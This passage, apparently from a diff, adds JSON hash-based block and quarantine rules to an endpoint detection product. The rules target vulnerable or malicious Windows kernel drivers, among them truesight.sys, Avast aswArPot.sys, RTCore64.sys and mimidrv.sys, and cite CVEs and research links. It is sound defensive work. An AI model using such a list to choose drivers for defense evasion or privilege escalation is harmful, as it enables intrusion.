"3e0917b3-ccaf-5ad2-b0fa-c0b62955c887", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831985Z", + "creation_date": "2026-03-23T11:45:30.831987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a3d046af99f88973d09dd034ac9b49bd74e2abfd829d2d73cc75b5e0d1d6059", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e1979e8-e21f-580d-b3b8-4439c588cbbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477067Z", + "creation_date": "2026-03-23T11:45:31.477071Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.477081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d164cd50476f880c4ddd879db399bfbd53fcbbffcba3be9152e69f95d36a1d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e255873-2c5a-5e7c-9949-0ff731100561", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620565Z", + "creation_date": "2026-03-23T11:45:29.620567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620573Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e3ac6bb-dbc5-57ab-bf7d-89dc089ebc70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968705Z", + "creation_date": "2026-03-23T11:45:29.968707Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f33f349062cbaa5591760bed8b0185730e043440a302702e3be12554aa62104", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e435f38-e49b-56d1-a942-d08282ab0df5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143650Z", + "creation_date": "2026-03-23T11:45:32.143652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", 
+ "value": "1ff54579dc4b76e814495d8e1d452a6f868adf06c2de0afdc5c3878b380d0a17", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e441d39-c653-59a6-98f1-15142c8f0ba4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454066Z", + "creation_date": "2026-03-23T11:45:30.454069Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454078Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbf74bed1a4d3d5819b7c50e9d91e5760db1562d8032122edac6f0970f427183", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e4d8d40-0bd2-5cad-a69c-95acadedd0fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465227Z", + "creation_date": "2026-03-23T11:45:30.465230Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465239Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "492113a223d6a3fc110059fe46a180d82bb8e002ef2cd76cbf0c1d1eb8243263", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e53e505-5d70-5dc2-8354-20d1d0caf359", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808182Z", + "creation_date": "2026-03-23T11:45:31.808185Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808194Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65ea10f141b979601725e485131626c82f6e173bcfb5bac831fee25d59e4afc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e5abaae-3725-58cd-83dd-1e580af07492", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977647Z", + "creation_date": "2026-03-23T11:45:29.977650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "09bc9d0606d8b96f1d9fb18741bdb43aa5c188981d298df047b8c75351d68653", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e5bbe79-0cc7-5b5d-992e-60170d476749", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824433Z", + "creation_date": "2026-03-23T11:45:31.824437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0524c94ffc9460a05bce72e9f7d4fa18e3c65012400df223b319e13d2efb156d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e5c96f1-c90c-51c4-aa44-2aceba3ff44b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610159Z", + "creation_date": "2026-03-23T11:45:29.610161Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b3705b47dc15f2b61ca3821b883b9cd114d83fcc3344d11eb1d3df495d75abe", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e623caa-d5e7-545b-80c0-21ba99691224", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155452Z", + "creation_date": "2026-03-23T11:45:31.155454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ef4acefb20d9d76b65695771a22e245851e04a8eb2585a99fa725ece406ba62", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e67f682-c09a-5fb6-95cb-1fc57ce5de60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619266Z", + "creation_date": "2026-03-23T11:45:29.619268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e6ad2a5-63b5-5bdb-9f2a-108bd94cc804", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618151Z", + "creation_date": "2026-03-23T11:45:29.618153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c933f5d07ccb4bd715666cd6eb35a774b266ddd8d212849535a54192a44f667", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e70fd64-6344-506e-8e26-3584a117be24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606812Z", + "creation_date": "2026-03-23T11:45:29.606814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "120f7983011211e6740d7a3a4cd2354507866ef7d36a48e2e3a9bd5b52c21c8a", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e79a4d9-fdc3-53b9-aefb-a29d269af320", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153339Z", + "creation_date": "2026-03-23T11:45:31.153342Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d14bcd4178ec57464c6463b19a75b4f0549c42ccedc042c40189d68923215dbd", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e842552-ce04-53e9-b0f1-f3ea51b59a92", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616433Z", + "creation_date": "2026-03-23T11:45:29.616434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc7ebd191e0991fd0865a5c956a92e63792a0bb2ff888af43f7a63bb65a22248", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e8f1022-3f9f-539c-ba00-1a7af2c6af6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.824769Z", + "creation_date": "2026-03-23T11:45:30.824772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "991f3c936c30da549ef0be83af8cc8efbe2b9727f0437dee607591239b28c44f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e90c0e7-85c0-5c0a-832f-223bc393b7ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816822Z", + "creation_date": "2026-03-23T11:45:30.816824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816829Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c8ed1506b3e35f5eea6ac539e286d46ef76ddbfdfc5406390fd2157c762ce91", + "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e9250a7-4ec4-559f-931c-7ee140b70ac0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969023Z", + "creation_date": "2026-03-23T11:45:29.969025Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a54ef5cfbe6db599322967ee2c84db7daabcb468be10a3ccfcaa0f64d9173c7", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e99231f-af8c-5d56-a1d0-7d7f6093ceb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607363Z", + "creation_date": "2026-03-23T11:45:29.607365Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1c8ca232789c2f11a511c8cd95a9f3830dd719cad5aa22cb7c3539ab8cb4dc3", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e9c3a54-0e10-538a-82de-e3032a1c614a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820177Z", + "creation_date": "2026-03-23T11:45:30.820180Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820185Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3183d87a902db1bbdaecb37291b9d37c032ce9dfacbe4b36cc3032f5a643ab4", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3e9f797b-090f-586b-a677-43351c2e9c20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807587Z", + "creation_date": "2026-03-23T11:45:31.807589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c21e6134ea6ceb167984d7989f5a65425d7397907c79294dc4683b9785c9cc42", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ebb4ca2-6fdc-5a27-ae9e-0ee83186828a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159810Z", + "creation_date": "2026-03-23T11:45:31.159812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "98fcf8d6b7f61a3644566eb4ed699f7813a0aad1beb3ac7cf86b1f8aab412667", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3ebb736b-9353-5fad-9e61-f0929ad170c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480941Z", + "creation_date": "2026-03-23T11:45:30.480943Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 